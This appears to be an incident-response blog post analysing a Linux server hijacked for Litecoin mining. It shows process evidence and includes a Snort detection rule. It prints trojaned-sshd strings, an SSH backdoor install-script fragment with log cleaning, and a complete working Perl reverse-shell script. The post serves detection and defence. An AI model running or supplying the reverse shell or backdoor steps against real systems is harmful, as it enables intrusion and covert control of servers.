The case of Minerd
I recently ran across an interesting compromised system. While the initial vulnerability compromised was nothing special, compromised credentials, what the system was being used for and one of his persistence technique was a lot less common than I normally see. The system had 3 different backdoors and was used for mining virtual currency.
When responding to the system, I quickly noticed that an unknown process was running. Additionally, I saw that the running process was deleted and an additional file with the process had also been deleted(See Below). This is a common technique for attackers on Linux systems, while the file is marked deleted on the file system, the process keeps it open until its stopped.
Minerd
--------------
PS Results
1 S www-data 13335 1 99 80 0 - 13941 - Nov10 ? 12-01:46:12 ./minerd -o stratum+tcp://mine.pool-x.eu:9000 -u <user> -p <pw>--algo scrypt --no-longpoll -B
LSOF Results
minerd 13335 www-data txt REG 8,1 379680 385036 /tmp/minerd (deleted)
minerd 13335 www-data 4u IPv4 14473113 TCP d.local:41591->mine.pool-x.eu:9000 (ESTABLISHED)
--------------
Minerd is used for Litecoin mining, think cheaper version of bitcoin and primed for CPU harvesting of coins. As virtual currency values continues to increases, I’m expecting to see a lot more of these types of attacks on servers. Mining will be better financially than using the system for spamming or a basic bot.
The specific mining protocol for this software is (Stratum Mining Protocol) A Sample of the traffic to the mining pool (178.33.111.19).
--------------
{"params": ["ee9", "f2d2b32c8c45a965c0459d7ce169b9cbb71d741d2a77574577f6658dfa677
e0a", "01000000010000000000000000000000000000000000000000000000000000000000000000
ffffffff2103830207062f503253482f0410bf835208", "072f506f6f6c582f0000000001e08e472
a010000001976a9146effd3bfcee317f978ea0927efd99f5d7992dacd88ac00000000", ["28eab10
f99561dbabf1555ea7f36358e4752a7dc1a69ad980e50156e89e00320", "963c9c57be6a0b60f421
861cbfc8ca6aa75e5ca0ad43b9276a46a871223d381a", "ad83aa11bab14d23472518b9c0d5bc59a
b869b45f022a8e176a50c58af70abb4"], "00000002", "1b340532", "5283bf10", false], "i
d": null, "method": "mining.notify"}
--------------
I was able to find a writeup on the protocol @minind(dot)bitcoin(dot)cz/stratum-mining.
I did not find a snort rule for this kind of traffic. The rule below is looking at any port, as I was not able to verify the incoming port should be 9000. It seems to depend on the mining pool the attacker is using.
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible Bitcoin/LiteCoin Mining"; flow:established; content:"|7B 22 70 61 72 61 6D 73 22 3A 20 5B 22|"; Depth:15; classtype:bad-unknown; reference:url,mining.bitcoin.cz/stratum-mining; sid:1000500; rev:1;)
SSHD Trojaned
The attacker had time stomped all the files in the /usr/sbin directory to hide file modifications. We found some interesting strings in the SSH daemon to quickly discover the backdoor (See Below). Trojaned files have been around for a long time, but I do not often run into them on compromised Linux servers. In this case, the attacker was not very stealthy about modifications to the file.
--------------
Partial Strings from the back door
[1m |Enjoy this private backdoor! |
[2;31m
[1m <----|====O)))==)\) /====
[36m
[1m |We won't do any harm to you;) |
220f5212624556ad12718ecb1c5cdda2
--------------
The initial script for making the backdoor was not recovered on the servers. After doing some quick Googling, I came across this install script for a ssh backdoor (pastebin.com/CDe7epGA). Other parts of the toolkit seemed to matchup. This my not be the identical script, but it was close to what was used.
--------------
BPASS=`./tools/random.sh 12`
echo -e "${BLUE}# Backdoor Password set to : ${WHITE}${BPASS}${NORMAL}"
cat backdoor.h|sed -e s/SSHD_PASS/"$BPASS"/ -e s#LOG_PATH#"$LPATH"# > 1.temp
mv 1.temp backdoor.h
./configure --sysconfdir=/etc/ssh 2> error_log.1
./logcleaner -u root
echo -e "${CYAN}# ENJOY THIS PRIVATE BACKDOOR ${NORMAL}"
--------------
IRC BOT
The second backdoor that was used is a typical IRCbot. Nothing special here, the install directory was /var/lib/.phpdata/sshd. The attacker named the script sshd to try and provide more stealth for the system. The IRC Channel name was #MuieBa.
Perl Backdoor
This is a typical perl reverse shell, give the script the IP and port you want to “Shovel a shell” to. It was located in the /tmp folder and was never used by the attacker. The scripts stops the bash_history file from being saved and echos output when it connects to the destination. Its MD5 is 48d4d5a3dee9ef43e5b1387356d2f7ff and filename back.txt.
--------------
cat back.txt
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==-- \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
Are you seeing compromised servers being used for Mining currency?Let us know!
Tom Webb
Comments